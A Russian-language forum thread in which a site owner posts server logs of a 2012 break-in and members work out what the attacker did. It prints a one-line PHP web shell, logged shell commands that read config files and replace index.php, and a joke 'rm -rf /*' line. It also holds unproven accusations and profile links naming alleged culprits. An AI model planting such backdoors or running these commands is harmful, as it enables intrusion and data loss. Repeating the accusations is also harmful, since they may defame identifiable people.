81.30.162.38 - - [12/Jan/2012:10:46:21 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?file=default.css&version=3.3.3 HTTP/1.0" 200 2994 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:46:21 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?file=functions.js&version=3.3.3 HTTP/1.0" 200 19391 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:46:22 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?file=favicon.ico&version=3.3.3 HTTP/1.0" 200 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:47:44 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=la%20-la%20../../../../../ HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:47:46 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../ HTTP/1.0" 200 1360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:47:54 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../../config HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:47:57 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../.. HTTP/1.0" 200 1033 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:48:10 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=cat%20../../../../../../configs/database.xml HTTP/1.0" 200 632 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:48:25 +0200] "POST /uploads/icons/.svn/tmp/text-base/svn.php HTTP/1.0" 302 - "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:48:25 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua HTTP/1.0" 200 6070 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:33 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09 HTTP/1.0" 200 111694 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:33 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&script=db HTTP/1.0" 200 22377 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:35 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?file=loader.gif&version=3.3.3 HTTP/1.0" 200 673 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:35 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&table=cms_components HTTP/1.0" 200 1992 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:36 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&select=cms_components HTTP/1.0" 200 23521 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&table=cms_components" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:43 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&edit=cms_components&where%5Bid%5D=26 HTTP/1.0" 200 2629 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&select=cms_components" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:46 +0200] "POST /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&edit=cms_components&where%5Bid%5D=26 HTTP/1.0" 200 - "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&edit=cms_components&where%5Bid%5D=26" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:49:47 +0200] "GET /uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&select=cms_components HTTP/1.0" 200 24088 "http://09.vn.ua/uploads/icons/.svn/tmp/text-base/svn.php?server=localhost&username=09vnua&db=09&edit=cms_components&where%5Bid%5D=26" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:50:35 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:52:00 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=touch%20../../../../../index.html HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:52:34 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../.htaccess%20htaccess.txt HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:52:36 +0200] "GET / HTTP/1.0" 200 893 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:52:45 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../ HTTP/1.0" 200 1361 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:53:17 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../index.php%20../../../../../index_prod.php HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:53:23 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../index.html%20../../../../../index.php HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:53:24 +0200] "GET / HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
81.30.162.38 - - [12/Jan/2012:10:53:46 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../ HTTP/1.0" 200 1365 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
Спустя 11 минут, 40 секунд (18.05.2012 - 13:52) alexbel2404 написал(а):
тут не определишь прошел ли взлом) но попытки видны)
Спустя 2 минуты, 35 секунд (18.05.2012 - 13:54) inpost написал(а):
Очень похоже на include-inj.
Возьми и введи то, что они вводили и посмотри.
Возьми и введи то, что они вводили и посмотри.
Спустя 3 минуты, 44 секунды (18.05.2012 - 13:58) killer8080 написал(а):
Питер
попробуйте с имитировать эти запросы, и посмотрите что получиться.
попробуйте с имитировать эти запросы, и посмотрите что получиться.
| Цитата (Питер @ 18.05.2012 - 13:40) |
| 81.30.162.38 - - [12/Jan/2012:10:52:00 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=touch%20../../../../../index.html HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 81.30.162.38 - - [12/Jan/2012:10:52:34 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../.htaccess%20htaccess.txt HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" |
вот здесь явно видно, как пытались выполнить шел команды на сервере, нужно проверить ip.php, на предмет обработки переменной $_GET['q'].
Спустя 4 минуты, 56 секунд (18.05.2012 - 14:03) Питер написал(а):
Сайт завалили - факт. Самое важное - каким образом? Расшифровка действий.
А файлик такой - ip.php
<?php
echo shell_exec($_GET['q']);
А файлик такой - ip.php
<?php
echo shell_exec($_GET['q']);
Спустя 2 минуты, 21 секунда (18.05.2012 - 14:05) inpost написал(а):
Питер
shell_exec ? Так прямо без обработки?
Подставили команды юниксовые и получили доступ ко всему. touch, mv - это юниксовые команды копирования(кажется), вот прописали команды и отработали они на сервере.
shell_exec ? Так прямо без обработки?
Подставили команды юниксовые и получили доступ ко всему. touch, mv - это юниксовые команды копирования(кажется), вот прописали команды и отработали они на сервере.
Спустя 5 минут, 44 секунды (18.05.2012 - 14:11) Семён написал(а):
Шелл залили)))
Спустя 4 минуты, 17 секунд (18.05.2012 - 14:15) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 14:03) |
| А файлик такой - ip.php |
убей его
Спустя 6 минут (18.05.2012 - 14:21) TMake написал(а):
| Цитата (killer8080 @ 18.05.2012 - 15:15) |
| убей его |
А лучше выложи сюда
Спустя 2 минуты, 1 секунда (18.05.2012 - 14:23) killer8080 написал(а):
| Цитата (stepan @ 18.05.2012 - 14:21) |
| А лучше выложи сюда |
он его уже выложил
| Цитата (Питер @ 18.05.2012 - 14:03) |
| А файлик такой - ip.php <?php echo shell_exec($_GET['q']); |
Спустя 4 минуты, 21 секунда (18.05.2012 - 14:28) TMake написал(а):
| Цитата (killer8080 @ 18.05.2012 - 15:23) |
| он его уже выложил |
Да прошляпил
тогда можно играть в Русскую рулетку # [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Жив"
Спустя 4 минуты, 33 секунды (18.05.2012 - 14:32) Invis1ble написал(а):
Питер
поздно ты спохватился, логи за 12 января
поздно ты спохватился, логи за 12 января
Спустя 44 секунды (18.05.2012 - 14:33) killer8080 написал(а):
Питер
на этом форуме есть специалист по веб безопасности, Белый Тигр может поможет.
на этом форуме есть специалист по веб безопасности, Белый Тигр может поможет.
Спустя 2 минуты, 19 секунд (18.05.2012 - 14:35) Питер написал(а):
Да убил тогда же файл.
Залили другой - и так несколько дней, пока 33 уязвимости не открылось.
Это разработчики вымогали денег. Позвонили перед тем и давай ломать то что построили.
Знали хорошо свое г-но, может специально оставили дыры.
Пришлось убить сайт. Дешевле по новой все сделать.
Когда разберусь - обнародую имена вымогателей, что б никто больше не попался.
А Хостинг провайдер официальную бумагу прислал-
- Взлома не было, ошибка администратора.
На пару работают - разработчики и хостинг провайдер. Одни разводят, другие прикрывают. Еле успел логи взлома с хостинга скачать...
Залили другой - и так несколько дней, пока 33 уязвимости не открылось.
Это разработчики вымогали денег. Позвонили перед тем и давай ломать то что построили.
Знали хорошо свое г-но, может специально оставили дыры.
Пришлось убить сайт. Дешевле по новой все сделать.
Когда разберусь - обнародую имена вымогателей, что б никто больше не попался.
А Хостинг провайдер официальную бумагу прислал-
- Взлома не было, ошибка администратора.
На пару работают - разработчики и хостинг провайдер. Одни разводят, другие прикрывают. Еле успел логи взлома с хостинга скачать...
Спустя 1 минута, 59 секунд (18.05.2012 - 14:37) Invis1ble написал(а):
| Цитата |
| Это разработчики вымогали денег |
прямо-таки вымогали на ровном месте? или ты им не заплатил за работу?
Спустя 12 секунд (18.05.2012 - 14:37) TMake написал(а):
| Цитата (Питер @ 18.05.2012 - 15:35) |
| - Взлома не было, ошибка администратора. |
Так хостер Вам верно сказал - со стороны хоста взломов не было. Так что на хост можно не грешить.
Спустя 56 секунд (18.05.2012 - 14:38) inpost написал(а):
То есть Вы обманули разработчиков и не заплатили им? Я в шоке, и теперь они ещё и виноваты?
Спустя 27 секунд (18.05.2012 - 14:39) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 14:35) |
| А Хостинг провайдер официальную бумагу прислал- - Взлома не было, ошибка администратора. На пару работают - разработчики и хостинг провайдер. Одни разводят, другие прикрывают. Еле успел логи взлома с хостинга скачать... |
Хостер не несет ответственности за дыры в скриптах клиентов. Если бы взлом был через панель хостинга или ftp тогда другое дело.
PS а с разработчиками не было конфликта по оплате?
Спустя 30 секунд (18.05.2012 - 14:39) Invis1ble написал(а):
| Цитата |
| Так хостер Вам верно сказал - со стороны хоста взломов не было |
не факт, неизвестно как туда шелл попал
Спустя 1 минута, 18 секунд (18.05.2012 - 14:41) inpost написал(а):
killer8080
Да было, ТС же сказал, что они позвонили и потребовали деньги, видимо за оплату их услуг, а те их киданули, видимо.
Да было, ТС же сказал, что они позвонили и потребовали деньги, видимо за оплату их услуг, а те их киданули, видимо.
Спустя 2 минуты, 39 секунд (18.05.2012 - 14:43) killer8080 написал(а):
| Цитата (inpost @ 18.05.2012 - 14:41) |
| killer8080 Да было, ТС же сказал, что они позвонили и потребовали деньги, видимо за оплату их услуг, а те их киданули, видимо. |
В таких вопросах не стоит делать поспешных выводов, не зная всех нюансов
Спустя 4 минуты, 16 секунд (18.05.2012 - 14:47) Питер написал(а):
Остановился платить на сумме - 60т гривен ( почти 8 т дол) когда понял, что левые они.
Не умеют - а берутся, 3 раза переделывали, а время посчитали общее.
Студенты под руководством доцента тренировались.
А доцент этот другом был. Откуда ж знать, что он студентам бестолковым даст делать. Дня не было, чтоб сайт не глючил 10 раз.
Кто нибудь делал захудалый каталог на 2 кнопках за 8 т долл.?
Не умеют - а берутся, 3 раза переделывали, а время посчитали общее.
Студенты под руководством доцента тренировались.
А доцент этот другом был. Откуда ж знать, что он студентам бестолковым даст делать. Дня не было, чтоб сайт не глючил 10 раз.
Кто нибудь делал захудалый каталог на 2 кнопках за 8 т долл.?
Спустя 7 минут, 16 секунд (18.05.2012 - 14:55) Diamorph написал(а):
Что-то не вериться мне о правдивости информации про 60 000грн. - 8 000$...
Спустя 1 минута, 46 секунд (18.05.2012 - 14:56) Invis1ble написал(а):
Рассуждать о правдивости не имеет смысла, т.к. никаких доказательств не может быть предоставлено. Хотя мне тоже не верится.
Спустя 3 минуты, 52 секунды (18.05.2012 - 15:00) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 14:47) |
| Остановился платить на сумме - 60т гривен ( почти 8 т дол) когда понял, что левые они. |
Цена какая то заоблачная, вы что свой "вконтакте" заказывали?
Спустя 49 секунд killer8080 написал(а):
А по факту им вообще платили?
Спустя 9 минут, 16 секунд (18.05.2012 - 15:10) Питер написал(а):
Факт - свидетели есть. Бумага. Год делался каталог (точнее переделывался несколько раз) неумехами, которые возомнили себя себя хрен знает кем. Каждый раз с умным видом - так будет еще суперовей...
Вот они эти крассавцы - equalteam.net
Типа разработка у них - своя ЦМС Базальт - глюканутая и недоразвитая. Вот на мне они ее и развивали и за мой счет.
Только врали всю дорогу о крутизне своей.
Если есть ентузиасты - даром отдам эту ихню разработку. За оценку и описание продукта студентческого творчества. Вот только обяз - написать в форуме мнение свое.
Как? Пишите в личку...
Вот они эти крассавцы - equalteam.net
Типа разработка у них - своя ЦМС Базальт - глюканутая и недоразвитая. Вот на мне они ее и развивали и за мой счет.
Только врали всю дорогу о крутизне своей.
Если есть ентузиасты - даром отдам эту ихню разработку. За оценку и описание продукта студентческого творчества. Вот только обяз - написать в форуме мнение свое.
Как? Пишите в личку...
Спустя 4 минуты, 14 секунд (18.05.2012 - 15:14) johniek_comp написал(а):
Питер
Выложи код этого "проекта" сюда(пару файлов) мы оценим насколько они крутые. Что бы включать подсветку выдели код нажатием на "PHP"
Выложи код этого "проекта" сюда(пару файлов) мы оценим насколько они крутые. Что бы включать подсветку выдели код нажатием на "PHP"
Спустя 1 минута, 29 секунд (18.05.2012 - 15:15) Invis1ble написал(а):
johniek_comp
по паре файлов ничего ты не оценишь, нужна полная картина
лично мне влом изучать чей-то код...
по паре файлов ничего ты не оценишь, нужна полная картина
лично мне влом изучать чей-то код...
Спустя 3 минуты, 44 секунды (18.05.2012 - 15:19) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 15:10) |
| Факт - свидетели есть. |
Я имел ввиду, у вас был договор с ними на 60000 гривен, какую то часть этой суммы они получили от вас?
Спустя 21 секунда (18.05.2012 - 15:19) m4a1fox написал(а):
60000 тыс. грн. - ой что-то с трудом верится! вот бы ТЗ увидеть.
Спустя 2 минуты, 6 секунд (18.05.2012 - 15:21) Игорь_Vasinsky написал(а):
ну выложи index.php
Спустя 1 минута, 15 секунд (18.05.2012 - 15:23) Diamorph написал(а):
Вот данные которые нашел. Чел с Винницы. "Хакер"
http://esvit.moikrug.ru/
http://vk.com/esvit
http://moikrug.ru/companies/447694990/
http://esvit.moikrug.ru/
http://vk.com/esvit
http://moikrug.ru/companies/447694990/
Спустя 3 минуты, 10 секунд (18.05.2012 - 15:26) Питер написал(а):
ТЗ на Украинском. Так вернусь к вопросу - был ли взлом?
Несанкционированный доступ к сайту, действия, которые могли привести к его падению?
Несанкционированный доступ к сайту, действия, которые могли привести к его падению?
Спустя 4 минуты, 8 секунд (18.05.2012 - 15:30) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 15:26) |
| Так вернусь к вопросу - был ли взлом? |
естественно, шел ведь был, и кто то им пользовался.
Спустя 14 секунд (18.05.2012 - 15:30) johniek_comp написал(а):
| Цитата |
| ТЗ на Украинском |
ничего страшного, я переведу пацанам
Спустя 1 минута, 16 секунд (18.05.2012 - 15:32) Питер написал(а):
индекс файл перенаправляет дальше
<?php
error_reporting(E_ALL);
define('DEBUG', false);
define('APPLICATION_NAME', 'Site');
//define('WIDGET_BORDER_AROUND', true);
require_once '../main.inc';
<?php
error_reporting(E_ALL);
define('DEBUG', false);
define('APPLICATION_NAME', 'Site');
//define('WIDGET_BORDER_AROUND', true);
require_once '../main.inc';
Спустя 3 минуты, 25 секунд (18.05.2012 - 15:35) m4a1fox написал(а):
Питер
| Цитата |
| ТЗ на Украинском. |
Ничего! Я из Симферополя. Понятно будет. За это не переживай.
Спустя 1 минута, 12 секунд (18.05.2012 - 15:36) Invis1ble написал(а):
тут в топике украинцы одни помоему большая часть - украинцы
Спустя 1 минута, 10 секунд (18.05.2012 - 15:37) m4a1fox написал(а):
Invis1ble
Вроде не все! Часть может быть! Но не все!
Вроде не все! Часть может быть! Но не все!
Спустя 45 секунд (18.05.2012 - 15:38) Invis1ble написал(а):
m4a1fox
да да, я уже подредактировал коммент
да да, я уже подредактировал коммент
Спустя 22 секунды (18.05.2012 - 15:38) Игорь_Vasinsky написал(а):
| Цитата |
| тут в топике украинцы одни помоему большая часть - украинцы |
молодець, що виправив .. я б нічого не зрозумів
Спустя 1 минута, 30 секунд (18.05.2012 - 15:40) Питер написал(а):
Спустя 1 минута, 56 секунд (18.05.2012 - 15:42) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 13:40) |
| 81.30.162.38 - - [12/Jan/2012:10:47:44 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=la%20-la%20../../../../../ HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 81.30.162.38 - - [12/Jan/2012:10:47:46 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../ HTTP/1.0" 200 1360 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 81.30.162.38 - - [12/Jan/2012:10:47:54 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../../config HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 81.30.162.38 - - [12/Jan/2012:10:47:57 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=ls%20-la%20../../../../../.. HTTP/1.0" 200 1033 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" |
здесь кулхацкеры просматривали листинг директорий
| Цитата (Питер @ 18.05.2012 - 13:40) |
| 81.30.162.38 - - [12/Jan/2012:10:52:00 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=touch%20../../../../../index.html HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" |
здесь создали пустой файл index.html, если его не было
| Цитата (Питер @ 18.05.2012 - 13:40) |
| 81.30.162.38 - - [12/Jan/2012:10:52:34 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../.htaccess%20htaccess.txt HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" |
пардон не копию, а просто переименовали файл
| Цитата (Питер @ 18.05.2012 - 13:40) |
| 81.30.162.38 - - [12/Jan/2012:10:53:17 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../index.php%20../../../../../index_prod.php HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" 81.30.162.38 - - [12/Jan/2012:10:53:23 +0200] "GET /uploads/icons/.svn/tmp/text-base/ip.php?q=mv%20../../../../../index.html%20../../../../../index.php HTTP/1.0" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" |
здесь переименовали index.php в index_prod.php, а затем index.html в index.php. То есть вам подменили index.php на пустой файл. Естественно сайт должен был упасть
PS подправил
Спустя 16 минут, 34 секунды (18.05.2012 - 15:58) Питер написал(а):
Ну вот наконец то.
Доблесная СБУ (Служба Безопастности Украины) не нашла ни одного специалиста (так сказано было - есть аудиозапись) во всей Украине для того, чтоб провести экспертизу логов.
Хостер - может позже сдам - доблесно заявил, что в данных логах ничего незаконного нет.
Типа - админ ошибся.
Доблесная СБУ (Служба Безопастности Украины) не нашла ни одного специалиста (так сказано было - есть аудиозапись) во всей Украине для того, чтоб провести экспертизу логов.
Хостер - может позже сдам - доблесно заявил, что в данных логах ничего незаконного нет.
Типа - админ ошибся.
Спустя 3 минуты, 22 секунды (18.05.2012 - 16:02) killer8080 написал(а):
| Цитата (Питер @ 18.05.2012 - 15:58) |
| Хостер - может позже сдам - доблесно заявил, что в данных логах ничего незаконного нет. |
Сомневаюсь что они пытались что то анализировать
Похоже закладку сделали разработчики.
Спустя 7 минут, 55 секунд (18.05.2012 - 16:10) Invis1ble написал(а):
Питер
| Цитата |
| Хостер - может позже сдам - доблесно заявил, что в данных логах ничего незаконного нет. |
ну как бы формально - да. Вообще не представляю, каким образом лог можно квалифицировать как попытку взлома, ибо теоретически эти запросы могл слать кто угодно с какой угодно целью (опечатался в адресной строке браузера 100500 раз, как в том бородатом анекдоте про то как потерпевший сам 20 раз упал на нож)
Спустя 5 минут, 3 секунды (18.05.2012 - 16:15) Питер написал(а):
Да, так и было. После претензий по работе сайта - разработчики вроде согласились доделать - получили доступ к хостингу - и залили туда файлик ip.php
У меня ж видно время когда этот файл был создан.
Потом поморозились немного - Новый Год типа и начали требовать еще 100 тыс гривен (13 т дол)
Потом повалили все раз 20-ть подряд. Думали что сайт уже бабло зарабатывает. И правда - начали прибывать клиенты - был расчет на то что клиенты будут скандалить - я сдамся.
У меня ж видно время когда этот файл был создан.
Потом поморозились немного - Новый Год типа и начали требовать еще 100 тыс гривен (13 т дол)
Потом повалили все раз 20-ть подряд. Думали что сайт уже бабло зарабатывает. И правда - начали прибывать клиенты - был расчет на то что клиенты будут скандалить - я сдамся.
Спустя 2 минуты, 34 секунды (18.05.2012 - 16:17) johniek_comp написал(а):
Ага, виной всему обычный пользователь интернета, который ошибся и ввел в адресною строку команды для линухи ога!
ога! Спустя 3 минуты, 7 секунд (18.05.2012 - 16:20) killer8080 написал(а):
| Цитата (Invis1ble @ 18.05.2012 - 16:10) |
| ну как бы формально - да. Вообще не представляю, каким образом лог можно квалифицировать как попытку взлома, ибо теоретически эти запросы могл слать кто угодно с какой угодно целью |
такие запросы мог слать только тот, кто знал где оставлена закладка
| Цитата (Питер @ 18.05.2012 - 16:15) |
| Потом поморозились немного - Новый Год типа и начали требовать еще 100 тыс гривен (13 т дол) |
то есть по начальному договору 60тыс, вы сними расплатились?
Кстати как вы поднимали сайт, когда он падал?
Спустя 5 минут, 1 секунда (18.05.2012 - 16:25) Питер написал(а):
Расплатился - есть свидетели. Аудиозапись, наконец.
Поднимался сайт из бекапа.
НО уязвимостей оказалось столько - что каждый раз летело что то другое. Оно и само то дышало на ладан.
Хостинг - ВПС ПРОФИ, расчитанный на 15 тыс посетителей - как бы уже при 500 начинал тормозить по минуте на страницу, плюс сообщения - Фатал еррор или как там...
Поднимался сайт из бекапа.
НО уязвимостей оказалось столько - что каждый раз летело что то другое. Оно и само то дышало на ладан.
Хостинг - ВПС ПРОФИ, расчитанный на 15 тыс посетителей - как бы уже при 500 начинал тормозить по минуте на страницу, плюс сообщения - Фатал еррор или как там...
Спустя 17 секунд (18.05.2012 - 16:26) Invis1ble написал(а):
killer8080
я прекрасно понимаю, кто на самом деле мог слать их
я прекрасно понимаю, кто на самом деле мог слать их
Спустя 8 минут, 55 секунд (18.05.2012 - 16:35) Питер написал(а):
Тему пришлось закрыть.
Не смог найти специалистов в городе. Пару тройку пригласил - отвалили.
Если есть ентузиасты спецы - поднять каталог - отдаю в хорошие руки на пару лет. Не хочу сейчас этим заниматься.
Это торговые марки 09 и Бизнес Довидка (Бизнес Справка).
Домен 09.ua
Домены - BiznesDovidka.ua и BiznesSpravka.ua
Не смог найти специалистов в городе. Пару тройку пригласил - отвалили.
Если есть ентузиасты спецы - поднять каталог - отдаю в хорошие руки на пару лет. Не хочу сейчас этим заниматься.
Это торговые марки 09 и Бизнес Довидка (Бизнес Справка).
Домен 09.ua
Домены - BiznesDovidka.ua и BiznesSpravka.ua
Спустя 3 минуты, 49 секунд (18.05.2012 - 16:38) Питер написал(а):
Заработать можно на франшизе программного обеспечения для телефонных Бизнес Справок, внесения в каталог - да много на чем.
09 перешла на 109 - многие помнят как справочник и тд....
Отдам, продам...
09 перешла на 109 - многие помнят как справочник и тд....
Отдам, продам...
Спустя 2 минуты, 48 секунд (18.05.2012 - 16:41) johniek_comp написал(а):
Питер
в смысле? продаешь?
в смысле? продаешь?
Спустя 2 минуты, 4 секунды (18.05.2012 - 16:43) Guest написал(а):
mv - это не копирование, а перенос, мув.
Насчёт безопасности Veslon, занимается этими вопросами, так же подсказывает что и как надо делать, во избежание дальнейших взломов.
Но первое и основное правило - фильтровать все данные, тогда и вопросов о взломе будет меньше
Насчёт безопасности Veslon, занимается этими вопросами, так же подсказывает что и как надо делать, во избежание дальнейших взломов.
Но первое и основное правило - фильтровать все данные, тогда и вопросов о взломе будет меньше
Спустя 3 минуты, 31 секунда (18.05.2012 - 16:47) Guest написал(а):
ах да, основное правило защиты от взлома со стороны заказчика - полностью и в полном объёме выполнить начальные договорёности.
Ибо я не верю, что разработчики, которым вы выплатили всю оговоренную сумму решили от нечего делать валить ваш(?) сайт по бэкдорам.
Кстати о бэкдорах, их оставляют только если заказчик стрёмный, так что о своей позиции тоже стоит задумываться
Ибо я не верю, что разработчики, которым вы выплатили всю оговоренную сумму решили от нечего делать валить ваш(?) сайт по бэкдорам.
Кстати о бэкдорах, их оставляют только если заказчик стрёмный, так что о своей позиции тоже стоит задумываться
